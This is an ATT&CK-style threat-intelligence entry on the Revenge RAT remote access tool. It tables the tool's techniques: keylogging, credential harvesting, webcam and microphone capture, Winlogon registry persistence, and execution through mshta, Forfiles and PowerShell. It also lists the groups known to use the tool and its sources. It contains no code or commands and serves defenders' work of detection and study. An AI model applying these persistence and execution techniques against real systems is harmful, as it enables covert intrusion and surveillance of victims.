S0379 Revenge RAT
Revenge RAT is a freely available remote access tool written in .NET (C#).21
| Item | Value |
|---|---|
| ID | S0379 |
| Associated Names | |
| Type | MALWARE |
| Version | 1.2 |
| Created | 02 May 2019 |
| Last Modified | 17 November 2024 |
| Navigation Layer | View In ATT&CK® Navigator |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1123 | Audio Capture | Revenge RAT has a plugin for microphone interception.21 |
| enterprise | T1547 | Boot or Logon Autostart Execution | - |
| enterprise | T1547.004 | Winlogon Helper DLL | Revenge RAT creates a Registry key at HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell to survive a system reboot.2 |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.001 | PowerShell | Revenge RAT uses the PowerShell command Reflection.Assembly to load itself into memory to aid in execution.1 |
| enterprise | T1059.003 | Windows Command Shell | Revenge RAT uses cmd.exe to execute commands and run scripts on the victim’s machine.1 |
| enterprise | T1132 | Data Encoding | - |
| enterprise | T1132.001 | Standard Encoding | Revenge RAT uses Base64 to encode information sent to the C2 server.2 |
| enterprise | T1202 | Indirect Command Execution | Revenge RAT uses the Forfiles utility to execute commands on the system.1 |
| enterprise | T1105 | Ingress Tool Transfer | Revenge RAT has the ability to upload and download files.2 |
| enterprise | T1056 | Input Capture | - |
| enterprise | T1056.001 | Keylogging | Revenge RAT has a plugin for keylogging.21 |
| enterprise | T1003 | OS Credential Dumping | Revenge RAT has a plugin for credential harvesting.2 |
| enterprise | T1021 | Remote Services | - |
| enterprise | T1021.001 | Remote Desktop Protocol | Revenge RAT has a plugin to perform RDP access.2 |
| enterprise | T1053 | Scheduled Task/Job | - |
| enterprise | T1053.005 | Scheduled Task | Revenge RAT schedules tasks to run malicious scripts at different intervals.1 |
| enterprise | T1113 | Screen Capture | Revenge RAT has a plugin for screen capture.2 |
| enterprise | T1218 | System Binary Proxy Execution | - |
| enterprise | T1218.005 | Mshta | Revenge RAT uses mshta.exe to run malicious scripts on the system.1 |
| enterprise | T1082 | System Information Discovery | Revenge RAT collects the CPU information, OS information, and system language.2 |
| enterprise | T1016 | System Network Configuration Discovery | Revenge RAT collects the IP address and MAC address from the system.2 |
| enterprise | T1033 | System Owner/User Discovery | Revenge RAT gathers the username from the system.2 |
| enterprise | T1125 | Video Capture | Revenge RAT has the ability to access the webcam.21 |
| enterprise | T1102 | Web Service | - |
| enterprise | T1102.002 | Bidirectional Communication | Revenge RAT used blogpost.com as its primary command and control server during a campaign.1 |
Groups That Use This Software
| ID | Name | References |
|---|---|---|
| G1018 | TA2541 | 3 |
| G0089 | The White Company | 2 |
References
-
Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved November 17, 2024. ↩↩↩↩↩↩↩↩↩↩
-
Livelli, K, et al. (2018, November 12). Operation Shaheen. Retrieved May 1, 2019. ↩↩↩↩↩↩↩↩↩↩↩↩↩↩
-
Larson, S. and Wise, J. (2022, February 15). Charting TA2541’s Flight. Retrieved September 12, 2023. ↩